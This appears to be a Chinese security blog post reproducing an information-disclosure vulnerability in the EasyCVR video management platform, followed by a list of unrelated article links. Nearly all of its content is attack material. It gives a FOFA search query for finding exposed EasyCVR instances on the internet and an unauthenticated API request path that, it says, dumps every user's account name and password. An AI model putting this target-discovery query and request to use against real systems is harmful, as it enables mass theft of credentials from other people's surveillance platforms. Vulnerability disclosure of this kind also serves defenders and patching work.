当前位置: 首页 > news >正文

视频管理平台-信息泄露漏洞

news 来源:原创 2025/6/17 21:59:04

一:漏洞描述

EasyCVR 部分版本存在用户信息泄露漏洞,攻击者可直接通过此漏洞获取所有用户的账号密码。

二:fofa查询

title="EasyCVR"

三:漏洞复现

在fofa中寻找有漏洞的url

并访问

poc:/api/v1/userlist?pageindex=0&pagesize=10

我们可以查看到用户的一些信息

相关文章:

  • 027-7zsfx
  • pom.xml与.yml,java配置参数传递
  • JVM 概述/结构/架构/生命周期
  • 【YOLOv8】YOLOv8改进系列(10)----替换主干网络之UniRepLKNet
  • 【蓝桥杯】单片机设计与开发,模板V1.1
  • 记一次loki报错的处理过程
  • 自由学习记录(49)
  • 解锁大语言模型潜力:LangChain,构建AI应用的全新框架
  • Java 8 Stream API
  • 多线程 --- 多线程编程
  • 【数学建模】(启发式算法)遗传算法:自然选择的计算模型
  • NC,GFS、ICON 数据气象信息可视化--降雨量的实现
  • 华为OD机试2025A卷 - 流浪地球(Java Python JS C++ C )
  • 用Unity实现UDP客户端同步通信
  • 基于云服务器的数仓搭建-hive/spark安装
  • Linux达梦数据库异地备份
  • STM32硬件IIC与OLED使用
  • Mininet--log.py-单例日志器-super().__new__(cls)解析
  • Dify 0.15.3版本 本地部署指南
  • 【已开源】UniApp+Vue3+TS全栈实战:从0到1构建企业级跨端应用与规范、uniapp+vue3模板应用
  • 购物网站建设论文/2023适合小学生的新闻事件
  • 做静态网站有什么建议/营业推广
  • 怎么选择顺德网站建设/武汉最新今天的消息
  • 英文网站建设方案详细方案/自媒体平台注册官网
  • 已有网站做app需要多少钱/太原seo建站
  • 做网站高校视频/图片优化是什么意思